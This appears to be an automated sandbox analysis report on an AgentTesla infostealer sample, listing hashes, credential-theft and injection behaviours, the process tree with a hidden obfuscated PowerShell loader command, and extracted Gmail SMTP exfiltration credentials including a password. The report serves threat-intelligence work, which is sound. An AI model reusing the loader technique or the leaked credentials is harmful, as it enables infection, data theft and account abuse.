Analysis
- max time kernel: 139s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 19-06-2024 14:36
- Static task: static1
- Behavioral task: behavioral1
  Sample: Package status.exe
  Resource: win7-20240221-en
General
- Target: Package status.exe
- Size: 810KB
- MD5: f7f038db9cf8b30eedadbd0e1bd06475
- SHA1: 183a7e4912252c912340580478a756449d420c18
- SHA256: 1c4bde8818c2caac1ea5d08697561d52e4f977a31f648ef55fe54f13efe572e1
- SHA512: 43ce6cce5d06b7317b524689610b9154ffb2d7b16a55328321b19eb4baba9fb793f46e6d4e2ca582cfa5c5b7d7627e59cbd1860169efa31f4eadae3155322d1e
- SSDEEP: 12288:NX8AAopS5s7Prs1K9qjmF7UC5xkd56/iS3xwWaoSOs9BOvLcajeUoZe3xn7dhLO3:18N56/iS3Dao55LTue3xn7d3sCDPa7l
Malware Config
Extracted
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: vjru ncjq zilj zxwk
Extracted (agenttesla)
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: vjru ncjq zilj zxwk
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
- Loads dropped DLL (2 IoCs)
  Processes: pid 2264 powershell.exe; pid 2616 Biseksualiteten.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  IoCs: flow 6 api.ipify.org; flow 7 api.ipify.org
- Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\SysWOW64\kobberbrylluppers.dis (process: Package status.exe)
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  Processes: pid 2616 Biseksualiteten.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: pid 2264 powershell.exe; pid 2616 Biseksualiteten.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 2264 (powershell.exe) set thread context of 2616 (procid_target 32)
- Drops file in Windows directory (1 IoC)
  File opened for modification: C:\Windows\resources\0409\Protoplasmaet.ini (process: Package status.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- NSIS installer (2 IoCs)
  YARA rules: behavioral1/files/0x00090000000122cd-19.dat matched nsis_installer_1 and nsis_installer_2
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: pid 2264 powershell.exe (8 IoCs); pid 2616 Biseksualiteten.exe (2 IoCs)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes: pid 2264 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token SeDebugPrivilege: pid 2264 powershell.exe; pid 2616 Biseksualiteten.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  PID 2156 (Package status.exe) wrote to memory of 2264, procid_target 28 (4 IoCs)
  PID 2264 (powershell.exe) wrote to memory of 2988, procid_target 30 (4 IoCs)
  PID 2264 (powershell.exe) wrote to memory of 2616, procid_target 32 (6 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\Package status.exe (PID 2156, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Package status.exe"
  Signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2264, level 2)
    Command line: "powershell.exe" -windowstyle hidden "$corabecan=Get-Content 'C:\Users\Admin\AppData\Local\gannetry\Hjelmkldtes\Antesunrise.Ski';$kitningers=$corabecan.SubString(12628,3);.$kitningers($corabecan)"
    Signatures: Command and Scripting Interpreter: PowerShell; Loads dropped DLL; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 2988, level 3)
      Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    - C:\Users\Admin\AppData\Local\Temp\Biseksualiteten.exe (PID 2616, level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Biseksualiteten.exe"
      Signatures: Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 69KB
  MD5: 95c71503bc640705b0973b75d1249e2b
  SHA1: 44a3114402114ed571c9920eebf2a2c938c7e9c3
  SHA256: 9c8314a2876644dff91652aefd829835e8700d7cd00d4a2f24173c29f9532dae
  SHA512: 4512060a616f79bfaa62c3837a2ae68f798f1bb54d63e037b432b79a720fba3fb0c9b48409f22473ff63a7a21a37eb6e119f9eaa05521d40b7bfb771b66e4808
- Filesize: 314KB
  MD5: 21282b210d55b15aa4083674e5b769eb
  SHA1: 425367906b18c625a6d6182c42ed67ece27b5262
  SHA256: 410339e0545e9ee17cf941a8f41b371917495b0811b0b4796c259710a83671c2
  SHA512: c6dae5cb93db9ec7b7f125c38e0a95887c9a3e9344d7da046162f08184e9bedae80fe18c6aea2dd98c36b6cd27726d189d341426fbda0ce3f05c58a09cd7e67e
- Filesize: 810KB (matches the submitted sample)
  MD5: f7f038db9cf8b30eedadbd0e1bd06475
  SHA1: 183a7e4912252c912340580478a756449d420c18
  SHA256: 1c4bde8818c2caac1ea5d08697561d52e4f977a31f648ef55fe54f13efe572e1
  SHA512: 43ce6cce5d06b7317b524689610b9154ffb2d7b16a55328321b19eb4baba9fb793f46e6d4e2ca582cfa5c5b7d7627e59cbd1860169efa31f4eadae3155322d1e